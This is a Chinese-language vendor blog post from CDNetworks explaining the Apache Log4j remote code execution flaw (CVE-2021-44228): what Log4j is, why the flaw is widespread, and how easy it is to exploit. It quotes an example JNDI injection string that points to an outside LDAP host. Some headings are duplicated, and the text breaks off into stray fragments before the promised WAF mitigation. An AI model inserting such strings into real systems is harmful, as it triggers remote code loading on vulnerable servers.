什么是 Apache Log4J 漏洞以及如何使用 CDNetworks 的 WAF 服务缓解它

2021 年 12 月 9 日,发现了一个影响流行 Apache 软件包的关键远程代码执行 (RCE) 漏洞。这个称为 Apache Log4J 的零日软件漏洞对全球数百万个应用程序和设备构成了潜在威胁。它的全球影响促使美国国家标准与技术研究所 (NIST) 发布了关键 […]The post 什么是 Apache Log4J 漏洞以及如何使用 CDNetworks 的 WAF 服务缓解它首先出现在 CDNetworks 上。

来源:CDNetworks _云安全

2021年12月9日,一个影响流行Apache软件包的关键远程代码执行(RCE)漏洞被发现。这个被称为Apache Log4J的零日软件漏洞对全球数百万个应用程序和设备构成了潜在威胁。它的全球影响促使美国国家标准与技术研究所(NIST)于2021年12月10日在国家漏洞数据库中发布了解决Log4J漏洞的关键漏洞CVE-2021-44228。鉴于此漏洞允许恶意攻击者在易受攻击的Java进程上执行任何命令,它获得了最高的通用漏洞评分系统(CVSS)严重性等级。

什么是Log4j?

Apache Log4j是几乎每个Java服务都在使用的基于Java的日志记录工具之一。作为Apache软件基金会提供的开源软件,Apache Log4j用于记录用户操作和应用程序行为。比如,当你访问服务器时,你的行为会被服务器通过Log4J工具记录下来,以供查看和查错。

Log4j漏洞影响为何如此严重?

Log4j无处不在。

Log4j无处不在。

Java技术栈被广泛应用在Windows、Linux、Mac操作系统、IoT家庭和商业设备、Web应用、后端开发、大数据等领域。Java作为一种开发工具,在Kafka、Elasticsearch、Flink等中间件解决方案中随处可见。此外,全球数千家公司在其Java服务中部署了Log4j工具。由于Log4j经常被重命名、重新打包和下载,因此该漏洞可能存在于任何地方。

该漏洞非常容易被利用

该漏洞非常容易被利用

通过在访问日志中插入 ${jndi:ldap://test.com/test} 等恶意代码即可成功利用 Log4J 漏洞。

该漏洞如何运作?

漏洞持续变异

CVE-2021-4104 CVE-2021-44228 9337